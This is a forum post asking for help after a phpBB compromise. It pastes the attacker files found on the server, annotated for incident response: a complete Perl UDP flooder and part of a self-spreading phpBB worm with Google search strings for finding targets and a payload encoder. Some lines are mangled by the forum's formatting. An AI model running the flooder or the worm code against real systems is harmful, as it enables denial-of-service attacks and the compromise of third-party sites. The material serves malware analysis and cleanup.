phpBB exploited, worm received... Help
Yesterday at about 10:00am, someone exploited a phpBB forum installed on my system — uploading a worm (I've attached two of the files below), changing the dependency table, and changing the permissions on a good deal of the files. Luckily, I don't think the attack was targeted at anyone in particular — just an automated attack from another machine; that doesn't change the fact that we were compromised.
Last night we downloaded and ran an anti-virus, and it supposedly got rid of a lot of viruses (although I think the majority, if not all, were just e-mail attachments). We also fixed the permissions, but the dependency table is still not working correctly, and we're not at all sure the worm is completely gone: the last time we reset things it was put back into /tmp and all the permissions were changed again — which means either the phpBB hole it came in through is still open and we are simply being re-infected, or something still on the box (a running process or a scheduled job) is restoring it.
So I'm here asking you all: what should we do? What's a good anti-virus that detects phpBB worms and actually FIXES them, and the mess they cause?
My sysadmin says formatting (wiping and reinstalling) is the best bet, but I'd really rather not do this... Neither of us has a very fast line, we'd have to back up over 5 GB of data, and all the sites we host have to stay up — any downtime at all is unacceptable. (I do understand that once an attacker has been able to change permissions across the system, an anti-virus scan can't prove the box is clean.)
jesus (in /tmp):
#!/usr/bin/perl
###
# Coffe, to all of you fed up of milk!
# coded by live, gr33tz to lucipher
#
# NOTE(review): annotated as found, for the incident responder -- this is
# the attacker's tool, not code to fix or run.  It is a UDP flooder: once
# started it uses this host to attack third parties for a fixed number of
# seconds.  Indicators: a perl process that ps/top show as
# "/usr/sbin/httpd" (see $0 below) and sustained outbound UDP to hosts you
# do not normally talk to.  It needs no privileges, so it runs fine as the
# web-server user.
use Socket;
# Needs at least a victim list and a duration; the port is optional.
if (@ARGV < 2) {
die "Coffe, Simple UDP flooder by live\n" .
"Usage: coffe <victim[:victim2:...:victimN]> <time_out> [port]\n";
}
# Overwrites the command line shown by ps/top so the process masquerades as
# Apache.  `ls -l /proc/<pid>/exe` (or `lsof -p <pid>`) still points at the
# perl binary, which is how to tell the two apart.
$0 = "/usr/sbin/httpd";
# Colon-separated victim list (host names or dotted quads) -> packed
# addresses for sockaddr_in().
@sin = map { inet_aton $_ } split /:/, $ARGV[0];
# Absolute stop time: now + <time_out> seconds.
$t = time +$ARGV[1];
# nazis are comming!!
# Ordinary UDP socket (protocol 17 = UDP) -- no raw socket, so the source
# address is this machine's real one and the flood is attributable to it.
socket SS, PF_INET, SOCK_DGRAM, 17;
while (1) {
# Fires a one-byte datagram ("0") at a randomly chosen victim, on the
# requested port or a random one below 65000, with no pause between sends.
send SS, 0, 0, sockaddr_in($ARGV[2] || rand 65000, $sin[rand @sin]);
# Stops only on the clock; there is no other exit.
print "Done!\n" and exit if time >= $t;
}
###
# Coffe, to all of you fed up of milk!

# coded by live, gr33tz to lucipher
use Socket;
# NOTE(review): second, identical paste of the "jesus" UDP flooder found in
# /tmp; annotated for the responder, not fixed.  Requires a victim list and
# a duration; port optional.
if (@ARGV < 2) {
die "Coffe, Simple UDP flooder by live\n" .
"Usage: coffe <victim[:victim2:...:victimN]> <time_out> [port]\n";
}
# Masquerades as Apache in ps/top; /proc/<pid>/exe still shows perl.
$0 = "/usr/sbin/httpd";
# Colon-separated victims -> packed addresses.
@sin = map { inet_aton $_ } split /:/, $ARGV[0];
# Stop time: now + <time_out> seconds.
$t = time +$ARGV[1];
# nazis are comming!!
# Plain UDP socket; source address is not spoofed.
socket SS, PF_INET, SOCK_DGRAM, 17;
while (1) {
# One-byte datagram ("0") to a random victim on the given or a random port,
# as fast as the loop will go.
send SS, 0, 0, sockaddr_in($ARGV[2] || rand 65000, $sin[rand @sin]);
print "Done!\n" and exit if time >= $t;
}
linuxday3 (In /tmp):
(Censored by me — only the beginning of the script is reproduced; the remote() routine it declares, presumably the exploit-delivery part, and the main loop are not shown.)
#############################################################
# Developed by br0k3d #
# For educational purpose only #
# Based ( almost ripped ) at ASW Worm! #
# Just made it fo study perl
#
# 2nd Version - F***z Google #
# => br0k3d@gmail.com <= #
#############################################################
use strict;
# NOTE(review): the two lines below were `use IO::Socket;` in the original;
# the forum rendered the ":S" as an emoticon and split the line.  The same
# damage appears in http_query() further down.  Left as pasted -- this
# listing is evidence to analyse, not code to run.
use IO:
ocket;
use IO::Handle;
# Disguises the process as Apache in ps/top output.  The 16 trailing NULs
# pad the new name so it overwrites the whole of the original command line.
# `ls -l /proc/<pid>/exe` still points at the perl interpreter.
my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
# Forks here with neither side exiting; $pid is not referenced anywhere in
# the part of the listing shown, so both copies keep running.  Combined with
# the `fork and exit` at the top level below, expect more than one process.
my $pid=fork;
# Forward declarations (with prototypes).  remote() is declared here but its
# body is not in the part of the listing that was posted.
sub fetch();
sub remote($);
sub http_query($);
sub encode($);
# Target discovery.  Searches Google (google.com.br) for phpBB
# "viewtopic.php" pages and returns the URLs (scheme stripped) of the result
# links.  Probably how this forum was found: it was in Google's index for
# one of the strings below.  Takes no arguments.
sub fetch(){
# Random number appended to the search string so that repeated searches
# return different result pages.
my $rnd=(int(rand(9999)));
# 50 or 100 results per page, starting at a random multiple of that.
my $n= 50;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
# Search strings ("dorks").  The version strings 2.0.4/2.0.6/2.0.8 in the
# forum footer are what it is hunting for.
my @str=("viewtopic.php+%3Ft%3D+",
"viewtopic.php+%3Fp%3D+",
"powered+by+phpBB+2.0.6+viewtopic+",
"powered+by+phpBB+2.0.8+viewtopic+",
"powered+by+phpBB+2.0.4+viewtopic+"
);
my $query="www.google.com.br/search?q=";
$query.=$str[(rand(scalar(@str)))].$rnd;
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
# Every http:// link in the result page becomes a candidate, except
# Google's own (cache / translate) links.
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
# Bare-bones HTTP/1.0 GET, used for the Google search (and presumably by
# remote(), whose body is not in the listing shown).  $url is
# "host/path?query", optionally prefixed with href="http://.  Returns the
# whole raw response (status line and headers included) as one string, or
# "" if the connection failed or the 10-second alarm fired.
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
# Peel the host off the front of the URL; whatever is left is the path.
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
# $host is interpolated into the pattern unescaped (its dots are wildcards).
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
# Ten-second watchdog: the handler dies out of the eval if the server hangs.
local $SIG{ALRM} = sub { die "1";};
alarm 10;
# NOTE(review): originally `IO::Socket::INET->new(...)`; the forum turned
# the ":S" into an emoticon and split the line.  Observation: `or return`
# leaves the eval block (not the sub) with the alarm still armed and the
# localised handler already restored, so a failed connect can later kill
# the process with SIGALRM unless another alarm() resets it first.
my $sock = IO:
ocket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
# Fingerprint for access logs, if remote() sends its exploit through this
# routine: HTTP/1.0 requests with "User-Agent: Mozilla/4.0" exactly.
print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
# Turns an arbitrary string into a PHP expression built from chr() calls:
# "ab" -> "chr(97)%252Echr(98)".  %252E is a double-URL-encoded "."; after
# the web server decodes it once it is %2E, and a second decode yields PHP's
# "." string-concatenation operator.  This looks like the payload encoding
# of the public phpBB 2.0.x viewtopic.php exploit (the "highlight"
# parameter flaw) -- confirm against the phpBB version installed here.
# Either way, "chr(" together with "%252E" in a viewtopic.php request is a
# high-signal string to grep the web server's access logs for; it should
# show when the exploit arrived and from which address.
sub encode($) {
my $s = shift;
# /s so the "." also matches newlines inside the payload.
$s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
# Drop the trailing separator.
$s =~ s/%252E$//;
return $s;
}
# Daemonise: the parent exits and the child carries on (a failed fork is
# swallowed by the eval and the script just keeps running in the
# foreground).  Together with the earlier unconditional `my $pid=fork;`
# this leaves two background copies, as far as the visible code goes --
# kill all of them, not just the first one found.
eval {fork and exit;};
$|++;
# Bareword handle, two-argument open in append mode, unchecked: writes to a
# file literally named "57825" in the current directory (which was /tmp
# here, judging by where the scripts turned up).  Collect it before cleaning
# up -- it is presumably the worm's own record of what it did from this host.
open LOG,">> 57825";
autoflush LOG 1;
srand;
# First command-line argument; not referenced in the part of the listing
# shown.
my $iam=$ARGV[0];
# Presumably the run limit (one day from start); its use is not visible.
my $oneday=time+86400; # It used to be one week, but Google got fed up ...
my $page="";
my @urls;
my $url;
# Developed by br0k3d #
# For educational purpose only #
# Based ( almost ripped ) at ASW Worm! #
# Just made it fo study perl

# 2nd Version - F***z Google #
# => br0k3d@gmail.com <= #
#############################################################
use strict;
# NOTE(review): second paste of the same worm.  Here the `IO::Socket` import
# (already mangled into `use IO:` by the forum's emoticon filter) lost its
# second half entirely, so this copy is not valid Perl as pasted.  Kept as
# evidence only.
use IO:

use IO::Handle;
# Masquerades as Apache in ps/top; NUL padding overwrites the original
# command line.  /proc/<pid>/exe still shows the perl interpreter.
my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
# Unconditional fork, $pid unused in the visible code: both copies continue.
my $pid=fork;
# Forward declarations; remote() has no body in the posted listing.
sub fetch();
sub remote($);
sub http_query($);
sub encode($);
# Duplicate paste of the target-discovery routine: queries Google
# (google.com.br) for phpBB viewtopic.php pages and returns the result
# links minus Google's own.  No arguments.
sub fetch(){
# Random suffix so repeated searches land on different result pages.
my $rnd=(int(rand(9999)));
# 50 or 100 results per page, random starting offset.
my $n= 50;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
# Search strings; phpBB 2.0.4/2.0.6/2.0.8 footers are the target.
my @str=("viewtopic.php+%3Ft%3D+",
"viewtopic.php+%3Fp%3D+",
"powered+by+phpBB+2.0.6+viewtopic+",
"powered+by+phpBB+2.0.8+viewtopic+",
"powered+by+phpBB+2.0.4+viewtopic+"
);
my $query="www.google.com.br/search?q=";
$query.=$str[(rand(scalar(@str)))].$rnd;
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
# Harvest every http:// link except cache/translate/google ones.
while ($page =~ m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
# Duplicate paste of the HTTP/1.0 GET helper.  NOTE(review): in this copy
# the socket line was lost entirely (only `my $sock = IO:` survives, the
# `ocket::INET->new(...)` half is gone), so $sock is never assigned and the
# block is not valid Perl as pasted.  Annotated for the record only.
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
# Split the URL into host and path.
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
# Ten-second watchdog.
local $SIG{ALRM} = sub { die "1";};
alarm 10;
# Truncated: was `IO::Socket::INET->new(PeerAddr=>..., PeerPort=>"80",
# Proto=>"tcp") or return;` in the first copy of the listing.
my $sock = IO:

# Request fingerprint: HTTP/1.0, "User-Agent: Mozilla/4.0".
print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}
# Duplicate paste of the payload encoder: each byte becomes chr(NN), joined
# by %252E (a double-URL-encoded "." -- PHP's concatenation operator after
# two decodes).  "chr(" plus "%252E" in a viewtopic.php request is the
# string to grep the access logs for.
sub encode($) {
my $s = shift;
# /s so "." also matches newlines.
$s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
# Strip the trailing separator.
$s =~ s/%252E$//;
return $s;
}
# Duplicate paste of the top-level setup.  Daemonise (parent exits, child
# continues); with the earlier unconditional fork this leaves two copies in
# the visible code.
eval {fork and exit;};
$|++;
# Unchecked two-argument append open of a file literally named "57825" in
# the current directory (/tmp here).  Preserve it before cleaning up.
open LOG,">> 57825";
autoflush LOG 1;
srand;
# First argument; unused in the visible portion.
my $iam=$ARGV[0];
# Presumably the one-day run limit; its use is not shown.
my $oneday=time+86400; # It used to be one week, but Google got fed up ...
my $page="";
my @urls;
my $url;
There was also a file called ".yougothacked" in /tmp... That may not be the exact file name, but it's close. (Names starting with a dot don't show up in a plain `ls`; use `ls -la /tmp` to list them, and keep a copy of everything found there before deleting it.)